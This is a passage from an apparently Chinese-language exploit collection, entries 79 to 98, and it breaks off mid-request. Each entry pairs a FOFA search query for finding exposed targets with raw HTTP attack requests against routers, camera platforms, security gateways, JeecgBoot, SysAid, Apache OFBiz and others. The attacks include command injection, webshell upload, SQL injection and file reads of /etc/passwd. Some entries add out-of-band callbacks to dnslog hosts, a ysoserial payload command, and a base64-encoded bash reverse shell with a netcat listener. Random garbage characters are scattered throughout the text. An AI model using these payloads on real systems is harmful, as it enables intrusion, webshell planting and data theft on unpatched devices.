GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
0 x0 {" J0 U% THost: x.x.x.x
0 U$ l! I4 O% P n4 }) u# \2 {8 p- ]- G( c; l% M. J/ Q
; Y$ A3 Y( t2 V+ O& v$ ]6 t
79. BYTEVALUE 百为流控路由器远程命令执行3 p; z A- E: M) \, ?7 S c
FOFA:BYTEVALUE 智能流控路由器
! }/ a( g9 R5 I: S3 Q7 _GET /goform/webRead/open/?path=|id HTTP/1.1
( E9 N/ ^ u6 s' BHost:IP
" x. E9 J; l! \' X7 \/ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0( @0 \; [& A( i+ P2 T! B) N) n9 y4 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. T6 z7 C* g, w `9 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 e9 i3 o! P0 H" b- D* X/ zAccept-Encoding: gzip, deflate
& R' H* R! H2 fConnection: close
$ z8 a p: R5 qUpgrade-Insecure-Requests: 1
5 I) Y- r) b& K2 K/ |& I
6 x# l ?) Z, z" w/ }5 P8 h! b/ j0 b& H* g3 B" ?) ^/ R
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传! m% {7 H1 I6 B+ Q
FOFA:app="速达软件-公司产品"! Y+ Z) w) F N* ~' c, E. f
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1; Y" c1 |8 ?, c1 u n. [( L
Host: x.x.x.x f/ m. s6 f. t1 c7 ^) B J7 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 R' ]3 G8 e9 ~( U) H ^4 H
Content-Length: 27, k; D2 o- S5 O, K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ c J$ }' T& c& UAccept-Encoding: gzip, deflate
1 y& v6 d8 S3 S: N: f% h2 q0 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! C4 N, \4 H- } X- |# [9 s) @Connection: close W5 Q/ d2 r' B- Z* ^! }) w5 w$ A1 D
Content-Type: application/octet-stream9 i' s- e9 ?5 K0 s0 ^
Upgrade-Insecure-Requests: 1# j/ K" ?+ G0 X( Z8 O
/ Y& a7 C1 Z9 v0 w0 X' _4 M<% out.print("oessqeonylzaf");%>
! U* ^) t h2 T& z \
7 i7 P, Y/ @( Y7 S# m
7 N c5 v4 F# WGET /xykqmfxpoas.jsp HTTP/1.1- c! O1 z% U! n
Host: x.x.x.x
/ H/ w% P2 O2 L( C) I3 i$ [0 y7 {) IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 a; m( `- L R9 m% _Connection: close/ D2 } Y$ Y5 w6 N* X. V
Accept-Encoding: gzip
) O2 Q# n `- c% t* D; r1 Z7 J4 ?7 H$ o
# x# e3 i6 T4 l2 H6 ^$ F8 d% |
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露 H( K; Y$ @8 k+ H0 f5 W+ p2 |
FOFA:app="uniview-视频监控"
5 |$ j5 c/ e1 SGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.13 O/ f+ f- v2 B6 W! x
Host: x.x.x.x
2 }5 _) A6 Q6 L$ O# s$ y2 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) s1 S/ \/ ?. ^% |3 ]' T+ `
Connection: close. C" F3 B5 L) p# a% B! F) N+ ~% `$ a
Accept-Encoding: gzip+ G# j! K( d; b5 M4 r1 D1 L. O
: e6 H3 }; a t0 K0 q" z. Z
7 R2 y0 q8 n5 L6 [
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
8 `1 q0 X: q" F! f; U7 k/ wFOFA:app="思福迪-LOGBASE"" r% t( V7 C! `7 W0 v- H
POST /bhost/test_qrcode_b HTTP/1.1# s8 r! c! Y3 E3 y k- v3 k4 B/ t
Host: BaseURL" E1 p# I9 B2 S* D5 I
User-Agent: Go-http-client/1.1# ?1 t s' G/ `# ^
Content-Length: 23. |0 }" [7 f& C
Accept-Encoding: gzip% B9 B3 r/ B9 R: H8 f) h* Q. d; T x
Connection: close) k: X. R/ ^/ J
Content-Type: application/x-www-form-urlencoded {, O, w7 w# {" f
Referer: BaseURL$ Q+ x1 R. C' f. }, Y$ W
/ o4 h+ e0 Z J! b- f) I4 S8 Rz1=1&z2="|id;"&z3=bhost8 K; ]. ^# b0 J& M% g3 d1 l
% n% g8 Z' |; s# J- {$ U; Q
+ q$ V+ m( L2 ?" t! @0 g& @7 ^6 V
83. JeecgBoot testConnection 远程命令执行 G. \$ H. l/ U* U, h7 d& Y! n9 b" f
FOFA:title=="JeecgBoot 企业级低代码平台"
$ b, ]6 ?+ Z8 [* l( q/ X& c& l! e0 D
2 O2 Z8 i5 x: A5 y; [POST /jmreport/testConnection HTTP/1.1
" ]! ~9 T: O) O. I9 F& l# nHost: x.x.x.x
) R2 j* ?$ B1 J$ I2 u5 C4 t7 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 e @' X2 q8 ]: M6 D# \) m
Connection: close& }4 `, R7 x. h/ a6 Q; R* A
Content-Length: 8881& w- k6 V3 T# M! r/ Y# t# N6 t
Accept-Encoding: gzip
( k) F3 n( K7 _+ nCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"2 b/ F* ~- ] I+ Q0 u0 S( s
Content-Type: application/json
& M' K( G9 @& N" k; L* d& q9 k7 d7 w$ f6 A) B5 q6 J# y$ Q
PAYLOAD
L, N7 f U9 r v1 C" A, ^9 G8 Y1 h; n
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入$ J* h' v: i7 a! i& n
FOFA:title=="JeecgBoot 企业级低代码平台"
3 `# Y1 J0 N8 h7 e# Y' Q7 `/ S) @" |1 R- T$ ^+ P. g5 ]
3 Z9 @5 \, f$ L6 ?' M8 a
7 I# E8 }/ c. I& m% S6 l. m7 L: n+ LPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.15 Y' v# @. _' F* ^, z; A7 S
Host: 192.168.40.130:8080: e3 u1 P2 i8 W6 Q8 L0 `: \& y
User-Agent: curl/7.88.1* Q4 v" |; ]6 W4 q+ y z ]
Content-Length: 156
1 K9 x4 L; n" L# \Accept: */*% n* w2 S$ ], n* F
Connection: close( u U- O- `2 j3 O( a) N4 Z$ p& b, [
Content-Type: application/json
+ z/ o* i: x% ~3 V1 ~8 ^Accept-Encoding: gzip+ X3 ~6 l8 O3 i
3 r6 d' M7 u) W/ K6 B
{
6 a( w+ ^4 Y2 s: N; Z "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",& g& V( d9 T3 J0 q) j% [: V0 N
"type": "0"
% j8 q: o H% N5 A4 a% ?! W+ K}" @8 U# h$ Z1 k/ t9 M/ D, D$ w
! v0 q/ g8 ^% }) e" ^
, A, X2 O# p) m7 ?2 [; ]85. SysAid On-premise< 23.3.36远程代码执行! W9 G. w1 `1 C$ f+ u% E s% w/ t3 Z2 Z
CVE-2023-47246
2 H, O& P5 U6 ~8 M# N) W. aFOFA:body="sysaid-logo-dark-green.png"
( Y6 n0 {- V! i8 T4 b0 GEXP数据包如下,注入哥斯拉马
! f I) K( Z6 zPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
- c! r& h1 Z0 h5 \: l, f+ ^. HHost: x.x.x.x8 k* v9 W9 G n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( C, |) |. Z' ?# n4 L6 c! {2 b
Content-Type: application/octet-stream5 Z. p* Q% T9 P+ }
Accept-Encoding: gzip
5 I- m1 a. M6 U" [
9 p7 ?1 @$ E( e' b0 rPAYLOAD. m& F3 ^; m4 Y: E+ q' u
( ]: H5 B% C9 v: R* _
回显URL:http://x.x.x.x/userfiles/index.jsp
$ P- i, h" c, S2 d& O M
5 Q' I! u8 [. l* ?% n1 ]& F86. 日本tosei自助洗衣机RCE
8 @9 l4 T6 j: S* ]* q: Y2 SFOFA:body="tosei_login_check.php"* B, v0 p* G" h1 r8 }4 V6 Y# E
POST /cgi-bin/network_test.php HTTP/1.1/ I' o# _, {; f/ |5 D* P
Host: x.x.x.x
+ k; i; V( l* v0 w+ j$ m* B3 D: oUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
5 I7 n; Q {6 @4 M( ^: rConnection: close
" }. `4 a/ M o/ y! A: m3 d; ]2 F7 IContent-Length: 44( I$ N0 t9 N" E
Accept: */*
7 Z- k4 f4 N1 `Accept-Encoding: gzip- I* F& W6 H: k* d4 w
Accept-Language: en
+ N, q l: l/ W- r4 u. SContent-Type: application/x-www-form-urlencoded
8 P+ h$ D( a+ p6 |! v1 `8 @: l8 L% K& v, G7 _) D9 |7 P; z' E; o
host=%0acat${IFS}/etc/passwd%0a&command=ping
9 C! W% ]; e. s% e/ |# T* w. b! V( \/ ^9 V) k3 L
, ?2 T* K; P: X7 ]$ } ?7 d87. 安恒明御安全网关aaa_local_web_preview文件上传
0 L& F3 j4 d3 b# L$ UFOFA:title="明御安全网关"
3 |8 t/ b# b# M, JPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.11 ^1 f4 @! X9 h
Host: X.X.X.X
2 ^+ J. y# i/ _4 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ M, h5 a) e; h' T! d0 L
Connection: close
1 o7 P$ n% H5 T4 y2 \2 E- x& yContent-Length: 198
+ I5 W" C+ V5 g% U' ZAccept-Encoding: gzip+ y. w% J1 [' S3 g% z2 O
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
8 R7 C# L; [2 |: u$ Z
2 @1 ~4 e+ Y. A* x1 ^9 O--qqobiandqgawlxodfiisporjwravxtvd
* B! T. F, g. d: UContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
+ x, x& p7 f( S& C6 ^: C! a7 CContent-Type: text/plain
$ n6 c' r# k0 Y! e& Y Z- W
& `+ K0 U Q5 c; a2ZqGNnsjzzU2GBBPyd8AIA7QlDq' t9 w) u& F7 Q+ \
--qqobiandqgawlxodfiisporjwravxtvd--3 V4 Q* D% P/ F0 f9 l
3 L' i' R9 @- f. V9 T' f! p
2 ^' U3 C# ~+ E; \' \/jfhatuwe.php
+ w& |9 s e( }1 @6 V2 h1 `6 z
% u4 S: F/ v9 u$ @% M88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行9 K. U5 s" o+ Z4 b V4 O) Z
FOFA:title="明御安全网关"
- G) K( p4 U# TGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1* ^4 R, q& i9 S: q! y3 \
Host: x.x.x.xx.x.x.x+ h* |, W' q3 V' l; U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; w* A6 k" P, u/ \% E1 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 ?. x0 X& W: DAccept-Encoding: gzip, deflate, A8 B& j: s, x; C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 p7 y2 U3 `! [/ C( K3 dConnection: close
; ]# p+ J5 d# W0 f3 i: G1 S
( j) A7 n$ A- K; x: t' d( e' }; L* q9 i" N, [
/astdfkhl.php0 C0 L( k8 G( i! b
; o* p5 h' D" j! E# Z89. 致远互联FE协作办公平台editflow_manager存在sql注入
. ] E! v7 R5 E# f* c2 `% Z6 fFOFA:title="FE协作办公平台" || body="li_plugins_download"
) Y4 k7 y( s6 APOST /sysform/003/editflow_manager.js%70 HTTP/1.1
5 @. f4 k" M; sHost: x.x.x.x
4 G) n5 t# G3 c4 U' r: mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 K! s. ?( S% N4 w8 cConnection: close
6 J' N9 p: k4 x/ F& dContent-Length: 41" Y9 b+ s4 m: X; e
Content-Type: application/x-www-form-urlencoded- ?& Z: u& @+ m- G/ T- u
Accept-Encoding: gzip
+ F* T2 g$ q# B- H: {& D4 i
7 z2 c; |# j3 e/ Y4 foption=2&GUID=-1'+union+select+111*222--+
8 v! `. c3 S: _, @% R' P- [; A, ^3 c, E9 c7 G
5 B1 t$ h% m* v/ c$ h90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行# `' A, b# \4 k( `; R
FOFA:icon_hash="-1830859634"
8 S8 M+ y5 } nPOST /php/ping.php HTTP/1.1
- t" t, V( @2 ]- E. g) U t9 rHost: x.x.x.x0 d8 s/ d7 d8 K# i2 g- j' {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 [) A* V9 Q2 t: zContent-Length: 51
- u; s4 P- I7 ]( C3 j& ?+ Q" @Accept: application/json, text/javascript, */*; q=0.01
/ p( p, W9 Z5 c2 ^; c% UAccept-Encoding: gzip, deflate8 {8 H" a( l+ L7 \4 \2 h0 C2 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 y2 B4 `& S6 K8 k* dConnection: close( {# x2 l4 N/ K
Content-Type: application/x-www-form-urlencoded
' G4 H g+ c8 }X-Requested-With: XMLHttpRequest9 D& K J T' t- i0 X7 h: ^
( M* I5 m; }7 b$ Fjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig( }8 U; e) y: G8 N' Z" b3 \; B
' v6 ^/ C" s2 R1 k# x
U0 J) y% C; c4 j4 l
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取9 v/ E, g" M2 t; T3 K4 o) h9 w
FOFA:title="综合安防管理平台"
3 o$ d4 f* x8 z8 D5 O5 G, bGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1( S2 z* q7 Q, }" k, J; R
Host: your-ip/ z& B* J7 F9 l$ l( D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
2 ]* r9 s- R1 }3 g& H# Y/ J3 cAccept-Encoding: gzip, deflate( ~' y2 Y1 Y5 g! v# w* m
Accept: */*- G8 [+ X5 i6 A' O0 P- t
Connection: keep-alive3 I4 Q! K8 c3 y* i5 @3 U
! v" {5 K5 S/ u! ?! T
! Q, Q$ p* S2 E2 Z2 u0 j5 Z
# ~: J% V/ \8 X- F% g92. 海康威视运行管理中心session命令执行5 N! d. `; d7 T/ i9 t+ q
Fastjson命令执行
* F- A- L; `( I8 c. f3 Yhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
+ v9 {9 `& n* ]8 Y% q5 JPOST /center/api/session HTTP/1.1 f: n; P6 h# ?/ C b+ W6 E
Host:$ f8 B& V% T' v0 A" H6 C$ l
Accept: application/json, text/plain, */*
" A6 v- D4 B. f" c" W4 Q/ b9 MAccept-Encoding: gzip, deflate
, @) c8 k8 O& SX-Requested-With: XMLHttpRequest
7 V. E7 H; O7 sContent-Type: application/json;charset=UTF-88 b/ ~5 N1 C, X# H2 v5 |5 ?
X-Language-Type: zh_CN8 b' x# G. S$ R* W, w
Testcmd: echo test
, X, a4 D8 q- d' h% j. \8 t: ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36) u# t7 R, E: M! D2 G# m
Accept-Language: zh-CN,zh;q=0.9
0 [# |) C; P% d& i9 I1 VContent-Length: 5778
# \% r1 c& O' h/ i9 n. X+ i
6 `% _+ l& E. ]8 |PAYLOAD6 v( z3 D8 r9 O; a
- @# G y7 V: Y: ?5 P% M# f
0 P% t0 O/ E1 |2 V2 O) c6 a! N
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
9 y$ j2 w. [9 r# I: {FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
& T4 [ I7 r& ?' ]POST /?g=app_av_import_save HTTP/1.1* ~: [; r( I5 @5 ~* M7 y
Host: x.x.x.x
/ t& ? m' F$ U8 P6 `: G( K- I2 |Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx9 f: v" c$ U7 Y6 U% U+ e! }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: S3 p! n7 I0 ] A5 u1 I y
6 {. D) @ ?* O% c$ G# e------WebKitFormBoundarykcbkgdfx% F) u) V( _$ K7 _
Content-Disposition: form-data; name="MAX_FILE_SIZE"
. C" R+ q) l) R2 H& W. c
0 @, J3 l# O/ o9 _3 I7 L9 F10000000
/ a" c- A6 o5 r! \5 o+ V8 O3 x------WebKitFormBoundarykcbkgdfx P- W9 ~' @. h- ~; ]; a# t
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"2 q. a* c1 `& Z/ n# q( U# q
Content-Type: text/plain$ u6 ]2 o9 F6 f7 p* U: {0 K
6 C# D! p+ Q7 F* R( Z( D$ Q
wagletqrkwrddkthtulxsqrphulnknxa* U( n4 z" T, C8 g
------WebKitFormBoundarykcbkgdfx
' k. @. n5 \8 o! v: O; v, J6 xContent-Disposition: form-data; name="submit_post"& @( }9 y% f0 D, H2 x; e
& n9 Y' x5 R% \# O/ h1 D9 Jobj_app_upfile
6 K3 l8 p. i, V* K' K' }& f------WebKitFormBoundarykcbkgdfx4 d0 S& @4 c P& t
Content-Disposition: form-data; name="__hash__"9 U, X$ [! F- V( J( P
$ y& z4 o; ?+ X A' O# N; x
0b9d6b1ab7479ab69d9f71b05e0e9445
7 P' e+ }. f. e. X------WebKitFormBoundarykcbkgdfx--
0 V8 K7 ~: V+ M
) J/ F9 E4 P# x4 }7 D
& `/ t4 d. h3 `2 i& d8 ]# ~GET /attachements/xlskxknxa.txt HTTP/1.1
1 ?, e1 q0 W7 n. j$ w( HHost: xx.xx.xx.xx L4 E4 ~5 R0 K% Z! c9 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% B6 h; L K" d7 Z, v6 ?0 N5 ~8 s9 s8 N7 Q' l
& h" Z/ r% j M9 C94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
% {) G5 S1 x; [FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
4 W% V- F; ]& V2 ~8 Z. QPOST /?g=obj_area_import_save HTTP/1.1
0 u3 O5 C% B: N% R/ R1 SHost: x.x.x.x
! N; G2 l1 w$ M6 Y/ iContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt. W- {+ m) a) z' O1 Z2 T5 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! c. M( n; C# s! v* K4 l; i
- \8 O% h2 [2 P6 Q------WebKitFormBoundarybqvzqvmt/ P* p! c/ P4 w t: O0 y: r& A
Content-Disposition: form-data; name="MAX_FILE_SIZE"
* l7 K0 {; n7 g, |
& O) P& _, B. ^6 o$ L10000000
. H6 Y/ W6 C6 v2 D: j7 z7 M------WebKitFormBoundarybqvzqvmt
* s3 U w! x9 I3 @/ [0 h( N: iContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
* B7 e/ C, U2 `, o: Q' N1 R* GContent-Type: text/plain
. P1 v4 E4 P! m7 b, t7 y6 U1 ?3 c/ _* ^1 k) @: o+ G7 g; ?! _
pxplitttsrjnyoafavcajwkvhxindhmu, I4 v& l& \7 j' w1 }
------WebKitFormBoundarybqvzqvmt
, {5 h% o% F- ]% F6 {Content-Disposition: form-data; name="submit_post"
# I6 d6 O" J3 C0 J: Q* e
7 [ A l4 i+ l3 Q8 ]) o$ Xobj_app_upfile
% h: w4 { Y2 H. y) D------WebKitFormBoundarybqvzqvmt" X% A! C, P6 v
Content-Disposition: form-data; name="__hash__"8 W6 \& u* e" v& s; I [
4 A$ p. |- M" K5 k: U D, f6 x
0b9d6b1ab7479ab69d9f71b05e0e9445
# q9 G6 z. K. R3 p" q: @------WebKitFormBoundarybqvzqvmt--
6 @, V. ?3 ~8 c5 {5 d
: R) ]: y/ i8 M3 o w* P& M: x9 f3 o; Q7 i2 ], M
: F+ R$ _8 r, g
GET /attachements/xlskxknxa.txt HTTP/1.11 a! G5 h, E; M: g
Host: xx.xx.xx.xx( T: k" D4 Q2 h' l% _6 q8 [ v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ M+ n+ B3 ?6 m5 E/ c& s, [( ~6 K; S+ @
# {9 l: C2 ?) x
5 o6 e d* F* C95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行( x% D8 g, L! o* @( B4 {4 |& s
CVE-2023-49070
0 I( N3 T/ G2 Q& x# oFOFA:app="Apache_OFBiz"4 n( u6 ^3 o" z1 Y* S8 Y
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1$ z& \- A0 T. B2 `) T, `0 d
Host: x.x.x.x
( |" y/ I2 n$ c" s6 W- x4 I( hUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) x" o d$ A5 V! h- }
Connection: close
8 n0 S7 V9 \5 w9 n2 { PContent-Length: 889: d, f& e0 p( X" ]( r
Content-Type: application/xml, Y& m" j7 a8 o6 s- l3 g& N2 M
Accept-Encoding: gzip9 a7 }3 v9 }7 d# `
! X2 d! R7 d4 X3 g
<?xml version="1.0"?>
: L X+ E" T( U1 N5 f. F<methodCall>
( w) `0 T' n, A1 M <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>7 j& J8 N0 F6 M* Z0 Q& H2 J
<params>, s9 k( r+ b6 l8 t0 H
<param>' {# ]4 ]/ c9 a
<value>
, d2 V' u! H/ e& H <struct>) A& T# U) e6 X* K, ]" k
<member>
0 v7 r' Q" {" q4 B7 | <name>test</name>$ P3 b, W2 T8 E5 ~3 ^. q) p
<value>
/ u m/ a! R' v6 J1 K, F <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
$ Y! u& k! Y. V6 \* j1 R9 K </value>
9 W; X0 p) ~$ ?) B2 W" Y* O- E: O </member># n' S8 d8 ]5 D$ u. B5 r
</struct>: |. Y3 t& ~* q" m: Q2 Q- [4 I
</value>
6 J+ |3 i) f! P! P' N% E: U# Z; a </param>/ J4 l# `- U. q# I; K0 _7 a" ~
</params>
* @* L. l. Z, N9 }" R/ s</methodCall>6 c; Y Y+ _$ `6 \+ ^
( ^5 D( Q. {8 ?$ k
/ m0 p' F8 }& b" N; R( u
用ysoserial生成payload
( @# b' m1 O `& V& }. x( Ijava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"; P5 n" `6 n" S, M
/ `& O- p7 W5 N$ \- r* v' C! O- I3 p: P; V7 T' S$ l
将生成的payload替换到上面的POC1 a8 E8 {* ]' F, C; x
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.10 X$ Q. Q% R: M- k% u- ?5 Y( W
Host: 192.168.40.130:8443
3 p; j' J$ |/ WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* K% b6 X; y8 ^( Z
Connection: close: u5 A5 L, v ^% c! Z
Content-Length: 889
) B$ X! S" y1 ^' }- S( IContent-Type: application/xml; {! w4 }! ?! r1 p7 I5 i- e w
Accept-Encoding: gzip# h4 Y2 D( u4 F" U$ {& _
3 ?) a$ t9 R! mPAYLOAD& I" @0 W6 w; C$ O/ j( }
* {: p) v8 o+ {9 g* S7 a' D) n96. Apache OFBiz 18.12.11 groovy 远程代码执行! K4 q. m7 v* }; m( ^- V
FOFA:app="Apache_OFBiz"
+ f& A+ q0 U% I8 T! vPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
) w% j! n! I# m& wHost: localhost:84435 T6 C3 O9 O2 z3 j& k+ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# @; ^1 C: m& _4 `- f3 E8 B
Accept: */*
2 O) J; K. f5 H: P6 z0 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 Y6 o! s: _- p/ x/ q
Content-Type: application/x-www-form-urlencoded' v( H' m4 U6 O% E9 |) d7 |
Content-Length: 55
- F6 K7 }* _9 T |( m9 r& ~7 [7 j7 j7 `! j: c- s
groovyProgram=throw+new+Exception('id'.execute().text);4 A9 W* B2 l2 Z' n! Q( Q" J
1 B& `( O; L0 {2 W
6 ?0 e, e V4 m: }: Q" A" [反弹shell6 S7 r7 k( V- l, ]. D
在kali上启动一个监听
1 ]& Q" h* B# a6 L' B+ }: ]( h2 onc -lvp 7777, R0 ?( O$ ]( a* u" r
/ X. J0 z' ]9 Z2 o# J. d
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" I) D5 U1 f3 y6 j1 F+ S0 O! Y
Host: 192.168.40.130:8443
: e0 b, m: B4 S; |% EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& r" B9 c# f3 S$ O5 Z
Accept: */*5 l" i/ Q$ Y/ c* i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 D r% f \. j( ~% V2 g
Content-Type: application/x-www-form-urlencoded
& n& ?, I: r8 R& [) x- S' TContent-Length: 71
' d) S8 V. t, f. F+ Q+ Q4 q/ i+ E5 f
4 n0 y7 R- ]% v3 s/ L, o! xgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
& s! E# K% w8 {# K6 ]$ L: O; m$ _0 @# n7 u& S# C3 k" ?! F! u' i
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
( c8 A5 h: Y8 B% UFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
# x6 O* @5 M$ gGET /passport/login/ HTTP/1.1; ?4 W2 I# Z$ F! A- w) ]% v+ B
Host: 192.168.40.130:80854 Q1 K6 y; M# b0 b3 N: m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# Z. O+ l) A# b" I. U2 M+ bAccept-Encoding: gzip3 U3 u$ n, T, u/ D. Y. b
Connection: close
) Z$ N# B/ Y, Q' kCookie: rememberMe=PAYLOAD
" L* R# M, [$ V! sX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
! u0 |1 m4 H6 X+ M; ?* ]* X. ?6 P/ \5 j0 K& z) T/ A% T: ?
h: i5 X9 G: s! t1 D/ T: {% w
98. SpiderFlow爬虫平台远程命令执行
# J: ?7 ]; b6 D1 c+ E0 Z3 eCVE-2024-0195
7 [& ?8 M$ X9 I7 {9 u5 c* UFOFA:app="SpiderFlow"
8 W3 n- `9 R2 \0 ^: HPOST /function/save HTTP/1.1
/ b# X" P; p2 U0 v: t: _Host: 192.168.40.130:8088
' E1 a- j/ E3 z1 V) }, H2 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 p0 p6 J. y' }! L/ U5 w
Connection: close
( |, b' ?6 T) \7 cContent-Length: 121
3 q7 ?) Q) T( {! |8 n" L3 ^Accept: */*
